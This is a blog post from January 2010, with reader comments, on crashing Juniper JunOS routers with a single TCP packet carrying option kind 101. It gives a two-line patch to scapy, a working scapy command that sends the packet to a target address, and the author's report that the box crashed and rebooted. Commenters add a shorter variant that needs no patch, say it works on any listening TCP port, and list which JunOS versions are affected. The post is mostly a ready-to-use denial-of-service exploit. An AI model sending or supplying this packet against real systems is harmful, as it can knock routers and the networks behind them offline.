Use scapy to send JunOS killin’ packet

January 10th, 2010 Jeremy L. Gaddis Leave a comment Go to comments


Photo from gr33ndata.

I just quickly hacked up scapy so that it would support sending TCP packets with option kind 0×65 (decimal 101). A diff is below (basically, just need to add two lines).

For reference, I’m on a FreeBSD 8.0 box running scapy 2.1.0 (from ports). inet.py is located in /usr/local/lib/python2.6/site-packages/scapy/layers.

$ diff inet.py inet.py.bak
203,204c203
<                 15 : ("AltChkSumOpt",None),
<                 101 : ("JunOS",None)
---
>                 15 : ("AltChkSumOpt",None)
215d213
<                 "JunOS":101
$

Once we've done that, we can then use scapy to launch a JunOS killin' packet for us!

$ sudo scapy
Welcome to Scapy (2.1.0)
>>> p=IP(dst='192.168.1.61')/TCP(dport=23,flags='S',options=[('JunOS', '')])
>>> send(p)
.
Sent 1 packets.
>>>

The box, of course, crashed and rebooted immediately.


Related Posts:
  • JunOS PSN-2010-01-623 Exploit
  • Changes to Juniper Networks Certification Program
  • JNCIA-ER
  • Even quicker packet capture data extraction using Wireshark
  • CFUnited Attendee Packet

    • Categories: Featured, Juniper, Security Tags:
    1. anon
      January 10th, 2010 at 16:25 | #1
      Reply | Quote

      does the vulnerability get exploited on any destination port other than telnet? what if you sent the same packet to 179, 22, 443, etc?

    2. jlgaddis
      January 10th, 2010 at 16:27 | #2
      Reply | Quote

      @anon — According to Juniper’s PSN, it should work on any TCP port that is “listening”. So it would work on 179, 22, 443, etc. if BGP/SSH/HTTPS etc. were running. I’ve tested it on 22/TCP, 23/TCP, and 80/TCP.

    3. johnp
      January 10th, 2010 at 17:18 | #3
      Reply | Quote

      thanks for confirming..what a mess!

    4. Ryan
      January 10th, 2010 at 23:30 | #4
      Reply | Quote

      I am wondering if anybody has actually confirmed that this works on the super old versions of JunOS I am using… My guess is that the old versions with FreeBSD 4.11 underneath may not have this problem. I cannot get my 7.4 Olive box to crash, nor a M40 with 7.0.

    5. anonymous_coward
      January 11th, 2010 at 09:20 | #5
      Reply | Quote

      No need to patch Scapy: TCP(options=[(101, '')])

    6. Paul
      January 11th, 2010 at 10:59 | #6
      Reply | Quote

      I couldn’t duplicate this on a M series running 7.6R3.6. I did duplicate this on 8.5R4.3.

      Thanks for the code!

    7. Derek
      January 11th, 2010 at 14:38 | #7
      Reply | Quote

      I confirmed this works on 7.6I2

    8. jlgaddis
      January 11th, 2010 at 15:01 | #8
      Reply | Quote

      @anonymous_coward — Thanks! I don’t use scapy much and didn’t realize I could pass options like that.

    9. jlgaddis
      January 11th, 2010 at 15:02 | #9
      Reply | Quote

      @Derek — thanks for the confirmation!

      The only 7.x version I have is 7.3R3.6. If I have time tonight, I’ll install it and see if I can get it to crash.

    1. No trackbacks yet.